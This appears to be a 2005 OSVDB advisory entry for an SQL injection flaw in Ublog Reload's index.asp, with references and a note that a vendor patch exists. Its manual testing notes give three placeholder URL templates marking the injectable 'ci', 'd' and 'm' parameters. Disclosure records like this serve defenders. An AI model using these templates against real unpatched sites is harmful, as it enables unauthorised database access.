Ublog Reload index.asp Multiple Variable SQL Injection

2005-06-19T06:55:44
ID OSVDB:17385
Type osvdb
Reporter Dedi Dwianto(the_day@echo.or.id)
Modified 2005-06-19T06:55:44

Description

Vulnerability Description

Ublog Reload contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'index.asp' script not properly sanitizing user-supplied input to the 'ci', 'd' and 'm' variables. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.

Solution Description

Currently, there are no known workarounds or upgrades to correct this issue. However, Uapplication has released a patch to address this vulnerability.

Short Description

Ublog Reload contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'index.asp' script not properly sanitizing user-supplied input to the 'ci', 'd' and 'm' variables. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.

Manual Testing Notes

http://[target]/UblogReload/index.asp?ci=[SQL INJECT][id]&s=category http://[target]/UblogReload/index.asp?d=[id][SQL Inject]&m=[mouth]&y=[year]&s=day http://[target]/UblogReload/index.asp?m=[mount][SQL Inject]&y=[year]&s=month

References:

Vendor URL: http://www.uapplication.com/ Vendor Specific Solution URL: http://www.uapplication.com/news_details.asp?id=8 Security Tracker: 1014245 Secunia Advisory ID:15747 Related OSVDB ID: 17387 Related OSVDB ID: 17386 Other Advisory URL: http://echo.or.id/adv/adv18-theday-2005.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0153.html ISS X-Force ID: 21024 CVE-2005-2009 Bugtraq ID: 13991